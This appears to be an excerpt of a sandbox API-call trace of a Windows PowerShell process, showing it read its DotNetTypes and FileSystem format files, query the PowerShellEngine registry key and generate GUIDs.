	[0629.090] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0629.090] GetFileType (hFile=0x2fc) returned 0x1
	[0629.090] SetErrorMode (uMode=0x1) returned 0x1
	[0629.090] GetFileType (hFile=0x2fc) returned 0x1
	[0629.090] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.092] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.093] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.093] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.093] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.093] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.093] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.094] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.095] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.095] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.095] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.095] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.095] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.095] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.096] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.096] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.097] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.098] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0xbce, lpOverlapped=0x0) returned 1
	[0629.098] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fbfde, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fbfde*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0629.098] ReadFile (in: hFile=0x2fc, lpBuffer=0x32fc8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x32fc8a8*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0629.098] CloseHandle (hObject=0x2fc) returned 1
	[0629.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0629.098] SetErrorMode (uMode=0x1) returned 0x1
	[0629.098] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfa0 | out: lpFileInformation=0x24cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0629.099] SetErrorMode (uMode=0x1) returned 0x1
	[0629.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0629.099] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d088 | out: phkResult=0x24d088*=0x2fc) returned 0x0
	[0629.099] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d00c, lpData=0x0, lpcbData=0x24d008*=0x0 | out: lpType=0x24d00c*=0x1, lpData=0x0, lpcbData=0x24d008*=0x56) returned 0x0
	[0629.099] CoTaskMemAlloc (cb=0x5a) returned 0x4de240
	[0629.099] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfdc, lpData=0x4de240, lpcbData=0x24cfd8*=0x56 | out: lpType=0x24cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cfd8*=0x56) returned 0x0
	[0629.099] CoTaskMemFree (pv=0x4de240) 
	[0629.099] RegCloseKey (hKey=0x2fc) returned 0x0
	[0629.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0629.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0629.101] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x4f35ad9b, Data2=0x6d0f, Data3=0x4434, Data4=([0]=0xac, [1]=0xd, [2]=0xc9, [3]=0xcc, [4]=0x59, [5]=0xf6, [6]=0x5c, [7]=0x92))) returned 0x0
	[0629.101] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xe1b64743, Data2=0xcc03, Data3=0x435d, Data4=([0]=0xaa, [1]=0x1f, [2]=0xed, [3]=0xd9, [4]=0xf6, [5]=0x2f, [6]=0xee, [7]=0xa))) returned 0x0
	[0629.101] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xeff12f53, Data2=0x1372, Data3=0x46d1, Data4=([0]=0xa0, [1]=0x55, [2]=0x83, [3]=0xd0, [4]=0xa3, [5]=0x16, [6]=0xfd, [7]=0xc6))) returned 0x0
	[0629.101] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xca7e7149, Data2=0x193a, Data3=0x4ece, Data4=([0]=0x96, [1]=0x65, [2]=0x75, [3]=0x68, [4]=0xe0, [5]=0x85, [6]=0xa, [7]=0xae))) returned 0x0
	[0629.101] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x1a2c69fd, Data2=0xcb7b, Data3=0x4622, Data4=([0]=0x86, [1]=0xbb, [2]=0xee, [3]=0x6d, [4]=0x95, [5]=0xd, [6]=0x3, [7]=0xa7))) returned 0x0
	[0629.101] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x9f15089f, Data2=0x66c2, Data3=0x4a27, Data4=([0]=0x88, [1]=0x8f, [2]=0x41, [3]=0xd9, [4]=0x88, [5]=0xcd, [6]=0x48, [7]=0xf6))) returned 0x0
	[0629.102] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x21877ba, Data2=0x9962, Data3=0x4718, Data4=([0]=0xb7, [1]=0xec, [2]=0xf8, [3]=0x30, [4]=0x76, [5]=0x81, [6]=0x7, [7]=0x59))) returned 0x0
	[0629.102] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xa6157e2c, Data2=0x80b, Data3=0x4085, Data4=([0]=0x8d, [1]=0x39, [2]=0x8b, [3]=0xe1, [4]=0x0, [5]=0x27, [6]=0xf5, [7]=0x19))) returned 0x0
	[0629.102] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xb60fa8d9, Data2=0x9eea, Data3=0x445e, Data4=([0]=0xa8, [1]=0xfe, [2]=0xdf, [3]=0xc4, [4]=0x35, [5]=0x85, [6]=0x8b, [7]=0xe))) returned 0x0
	[0629.102] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x1c959202, Data2=0xddb5, Data3=0x47a0, Data4=([0]=0xa2, [1]=0xcb, [2]=0x1e, [3]=0xb6, [4]=0x60, [5]=0xec, [6]=0x3, [7]=0xf))) returned 0x0
	[0629.102] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x3b90b44a, Data2=0x7670, Data3=0x4eeb, Data4=([0]=0xad, [1]=0xc1, [2]=0xca, [3]=0x79, [4]=0x1f, [5]=0xe9, [6]=0x4c, [7]=0x40))) returned 0x0
	[0629.102] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xce8b41c7, Data2=0xf0b6, Data3=0x44e7, Data4=([0]=0x8b, [1]=0x2a, [2]=0xc0, [3]=0x44, [4]=0x11, [5]=0xb0, [6]=0xc6, [7]=0x78))) returned 0x0
	[0629.103] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x7dfa63a7, Data2=0xfa9c, Data3=0x458d, Data4=([0]=0xa8, [1]=0xe0, [2]=0x73, [3]=0x60, [4]=0x87, [5]=0xf0, [6]=0x47, [7]=0xd9))) returned 0x0
	[0629.103] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x35f92c41, Data2=0xac66, Data3=0x422e, Data4=([0]=0xb4, [1]=0xdd, [2]=0x45, [3]=0x9f, [4]=0x9d, [5]=0xf6, [6]=0xe, [7]=0xa))) returned 0x0
	[0629.103] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xdb9567d, Data2=0xfd6a, Data3=0x4943, Data4=([0]=0x9e, [1]=0xbd, [2]=0x43, [3]=0xb3, [4]=0x53, [5]=0x4c, [6]=0xc9, [7]=0xb6))) returned 0x0
	[0629.103] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xe7aa25df, Data2=0xbdd9, Data3=0x4682, Data4=([0]=0x9b, [1]=0xf9, [2]=0xe4, [3]=0x27, [4]=0x5b, [5]=0xa3, [6]=0xa1, [7]=0xca))) returned 0x0
	[0629.103] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xbd5a7709, Data2=0x1bc7, Data3=0x4aa4, Data4=([0]=0x8a, [1]=0xe, [2]=0x29, [3]=0xff, [4]=0x5b, [5]=0x23, [6]=0xf7, [7]=0x70))) returned 0x0
	[0629.104] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x6e96a66b, Data2=0xe28f, Data3=0x41d4, Data4=([0]=0x8e, [1]=0x3b, [2]=0xfe, [3]=0x7d, [4]=0xce, [5]=0x96, [6]=0xea, [7]=0xb3))) returned 0x0
	[0629.104] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xb66ceedd, Data2=0xce53, Data3=0x44b6, Data4=([0]=0xa7, [1]=0x16, [2]=0xde, [3]=0x9f, [4]=0xb, [5]=0x42, [6]=0xb1, [7]=0x4b))) returned 0x0
	[0629.104] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x8417509, Data2=0xe927, Data3=0x4f2f, Data4=([0]=0xbe, [1]=0x1e, [2]=0x61, [3]=0x4f, [4]=0xef, [5]=0xeb, [6]=0x19, [7]=0xef))) returned 0x0
	[0629.104] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xc6ec1008, Data2=0x3c3c, Data3=0x429e, Data4=([0]=0x9b, [1]=0xfa, [2]=0x12, [3]=0x37, [4]=0x96, [5]=0x8f, [6]=0xaf, [7]=0xe6))) returned 0x0
	[0629.104] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x57fcc85e, Data2=0x5bb8, Data3=0x4cc0, Data4=([0]=0x90, [1]=0x4c, [2]=0xa0, [3]=0xf3, [4]=0xb1, [5]=0x54, [6]=0xbd, [7]=0x8c))) returned 0x0
	[0629.104] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x61c91faf, Data2=0xc87a, Data3=0x4d67, Data4=([0]=0x8b, [1]=0x26, [2]=0x1, [3]=0x8c, [4]=0x58, [5]=0xdb, [6]=0x66, [7]=0x3c))) returned 0x0
	[0629.104] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x2de0407c, Data2=0x5759, Data3=0x4df0, Data4=([0]=0xb0, [1]=0x88, [2]=0xae, [3]=0x8f, [4]=0xc2, [5]=0xe, [6]=0x59, [7]=0x19))) returned 0x0
	[0629.105] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x83852329, Data2=0xe3ec, Data3=0x4fc1, Data4=([0]=0xb9, [1]=0xcb, [2]=0xdd, [3]=0xb6, [4]=0xcf, [5]=0x8d, [6]=0x94, [7]=0xce))) returned 0x0
	[0629.105] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xbb432ea5, Data2=0x3b2c, Data3=0x4153, Data4=([0]=0xa2, [1]=0xf9, [2]=0x95, [3]=0x52, [4]=0xcc, [5]=0x32, [6]=0x77, [7]=0xdc))) returned 0x0
	[0629.105] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xd257fb45, Data2=0xb626, Data3=0x432b, Data4=([0]=0xa9, [1]=0x73, [2]=0x75, [3]=0x7c, [4]=0x83, [5]=0xde, [6]=0x6, [7]=0x71))) returned 0x0
	[0629.105] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x67051e01, Data2=0x723f, Data3=0x4e52, Data4=([0]=0xb8, [1]=0xe1, [2]=0x58, [3]=0xfb, [4]=0xfa, [5]=0xb1, [6]=0x90, [7]=0x6a))) returned 0x0
	[0629.105] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xa49eee42, Data2=0x1082, Data3=0x49c4, Data4=([0]=0x90, [1]=0xbb, [2]=0x42, [3]=0xb3, [4]=0xc2, [5]=0x56, [6]=0x7f, [7]=0x3d))) returned 0x0
	[0629.105] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xc8049067, Data2=0x5f57, Data3=0x4fef, Data4=([0]=0x80, [1]=0x46, [2]=0xac, [3]=0xda, [4]=0x94, [5]=0xe2, [6]=0x2a, [7]=0x6))) returned 0x0
	[0629.105] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xe75b3256, Data2=0xd57, Data3=0x4873, Data4=([0]=0xb7, [1]=0x73, [2]=0x66, [3]=0x9, [4]=0x4f, [5]=0xcf, [6]=0x22, [7]=0xf))) returned 0x0
	[0629.105] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x829ffdef, Data2=0xdcb4, Data3=0x497f, Data4=([0]=0xad, [1]=0xbe, [2]=0xc7, [3]=0x92, [4]=0xf1, [5]=0x6e, [6]=0x2a, [7]=0xdb))) returned 0x0
	[0629.106] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xeb0bc7af, Data2=0xa44f, Data3=0x478e, Data4=([0]=0x94, [1]=0x8e, [2]=0x98, [3]=0xb1, [4]=0x4c, [5]=0xe4, [6]=0x67, [7]=0x3d))) returned 0x0
	[0629.106] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x38d21ad7, Data2=0x2f6c, Data3=0x4e23, Data4=([0]=0xb9, [1]=0xb4, [2]=0x1, [3]=0x6b, [4]=0x9b, [5]=0x72, [6]=0xa3, [7]=0xaa))) returned 0x0
	[0629.106] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x13884cfe, Data2=0xcce5, Data3=0x48e9, Data4=([0]=0x95, [1]=0xc1, [2]=0x82, [3]=0x6b, [4]=0xb5, [5]=0x9f, [6]=0xe9, [7]=0x43))) returned 0x0
	[0629.106] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x67863817, Data2=0x3c6d, Data3=0x4d7a, Data4=([0]=0x85, [1]=0xb2, [2]=0x92, [3]=0x89, [4]=0xa, [5]=0xb2, [6]=0x4b, [7]=0xf3))) returned 0x0
	[0629.107] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xa2d9515d, Data2=0x6f54, Data3=0x429f, Data4=([0]=0xb7, [1]=0x3a, [2]=0x58, [3]=0x76, [4]=0x13, [5]=0x40, [6]=0xe9, [7]=0x92))) returned 0x0
	[0629.107] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0629.107] GetFileType (hFile=0x2fc) returned 0x1
	[0629.107] SetErrorMode (uMode=0x1) returned 0x1
	[0629.107] GetFileType (hFile=0x2fc) returned 0x1
	[0629.107] ReadFile (in: hFile=0x2fc, lpBuffer=0x340d2d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x340d2d0*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.110] ReadFile (in: hFile=0x2fc, lpBuffer=0x340d2d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x340d2d0*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.110] ReadFile (in: hFile=0x2fc, lpBuffer=0x340d2d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x340d2d0*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.110] ReadFile (in: hFile=0x2fc, lpBuffer=0x340d2d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x340d2d0*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.110] ReadFile (in: hFile=0x2fc, lpBuffer=0x340d2d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x340d2d0*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.110] ReadFile (in: hFile=0x2fc, lpBuffer=0x340d2d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x340d2d0*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.111] ReadFile (in: hFile=0x2fc, lpBuffer=0x340d2d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x340d2d0*, lpNumberOfBytesRead=0x24cff8*=0x119, lpOverlapped=0x0) returned 1
	[0629.111] ReadFile (in: hFile=0x2fc, lpBuffer=0x340d2d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x340d2d0*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0629.111] CloseHandle (hObject=0x2fc) returned 1
	[0629.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0629.111] SetErrorMode (uMode=0x1) returned 0x1
	[0629.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfa0 | out: lpFileInformation=0x24cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0629.111] SetErrorMode (uMode=0x1) returned 0x1
	[0629.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0629.112] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d088 | out: phkResult=0x24d088*=0x2fc) returned 0x0
	[0629.112] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d00c, lpData=0x0, lpcbData=0x24d008*=0x0 | out: lpType=0x24d00c*=0x1, lpData=0x0, lpcbData=0x24d008*=0x56) returned 0x0
	[0629.112] CoTaskMemAlloc (cb=0x5a) returned 0x4de240
	[0629.112] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfdc, lpData=0x4de240, lpcbData=0x24cfd8*=0x56 | out: lpType=0x24cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cfd8*=0x56) returned 0x0
	[0629.112] CoTaskMemFree (pv=0x4de240) 
	[0629.112] RegCloseKey (hKey=0x2fc) returned 0x0
	[0629.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0629.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0629.113] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x5ec7cb3a, Data2=0xe3ea, Data3=0x4ca3, Data4=([0]=0x8b, [1]=0xda, [2]=0x3d, [3]=0x41, [4]=0x81, [5]=0x1a, [6]=0x2, [7]=0x93))) returned 0x0
	[0629.113] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x938ba254, Data2=0x4a14, Data3=0x4440, Data4=([0]=0xaf, [1]=0xaa, [2]=0x24, [3]=0x1e, [4]=0xc1, [5]=0xc2, [6]=0xa2, [7]=0x72))) returned 0x0
	[0629.113] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xe0ed319, Data2=0x820, Data3=0x41fa, Data4=([0]=0xb5, [1]=0x32, [2]=0x76, [3]=0x57, [4]=0x64, [5]=0x98, [6]=0x1e, [7]=0x15))) returned 0x0
	[0629.114] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x23865dac, Data2=0x6bc5, Data3=0x481e, Data4=([0]=0x8c, [1]=0x96, [2]=0x45, [3]=0xb7, [4]=0x51, [5]=0xda, [6]=0xe6, [7]=0xbd))) returned 0x0
